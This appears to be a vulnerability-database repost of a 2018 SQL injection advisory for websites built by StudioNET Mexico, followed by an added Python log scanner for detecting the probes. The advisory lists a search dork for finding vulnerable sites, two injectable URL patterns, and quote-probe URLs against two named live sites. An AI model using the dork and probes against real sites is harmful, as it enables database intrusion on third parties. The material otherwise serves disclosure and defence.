Powered by StudioNET Mexico SQL Injection Vulnerability

CVE: N/A
Category: CWE-89
Price: N/A
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2018-09-07
CPE: cpe:cpe:/a:studionet:mexico
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090065

Below is a copy:

Powered by StudioNET Mexico SQL Injection Vulnerability
#################################################################################################

# Exploit Title : Powered by StudioNET Mexico SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/09/2018
# Vendor Homepage : studionet.mx ~ studionet-mx.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

StudioNET - Diseño de Logotipos, Sitios Web e Imagen Gráfica SQL Injection Vulnerability

# Google Dork  : intext:''Powered by StudioNET''

# Exploit : 

/ver_subcategoria.php?id=[SQL Inj]

/e_RECETAS.php?mod=ver&id=[SQL Inj]

#################################################################################################

# Example Site => 

garcia-s.com/ver_subcategoria.php?id=29%27 => [ Proof of Concept ] => archive.is/LESJt

pastranasproduce.com/e_RECETAS.php?mod=ver&id=8%27

# SQL Database Error => 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################
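
For defenders running a site built on this software, a log check for the probe pattern shown above (a non-numeric `id` on the two listed scripts). This is an added example, not part of the original advisory; it assumes combined-format access logs and that a legitimate `id` is always a short decimal integer, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The two endpoints named in the advisory, lowercased for matching.
WATCHED_PATHS = {"/ver_subcategoria.php", "/e_recetas.php"}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id on these pages is a short decimal integer.
VALID_ID = re.compile(r"\d{1,10}")


def suspicious_id(url):
    """Return the decoded id if url targets a watched path with a
    non-integer id, otherwise None."""
    parts = urlsplit(url)
    if parts.path.lower() not in WATCHED_PATHS:
        return None
    # parse_qs percent-decodes values, so id=29%27 is seen as "29'".
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("id", []):
        if not VALID_ID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, request_target, decoded_id) for each hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_id(match.group(1))
        if bad is not None:
            hits.append((number, match.group(1), bad))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Sep/2018:10:00:01 +0000] "GET /ver_subcategoria.php?id=29 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [07/Sep/2018:10:00:09 +0000] "GET /ver_subcategoria.php?id=29%27 HTTP/1.1" 200 312',
    '198.51.100.7 - - [07/Sep/2018:10:00:15 +0000] "GET /e_RECETAS.php?mod=ver&id=8%27 HTTP/1.1" 200 298',
    '203.0.113.5 - - [07/Sep/2018:10:01:02 +0000] "GET /e_RECETAS.php?mod=ver&id=8 HTTP/1.1" 200 4870',
    '203.0.113.9 - - [07/Sep/2018:10:02:40 +0000] "GET /index.php?id=abc HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

This only flags probing after the fact; the application-side fix for CWE-89 is to bind `id` as an integer parameter in the query instead of concatenating it into the SQL string.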
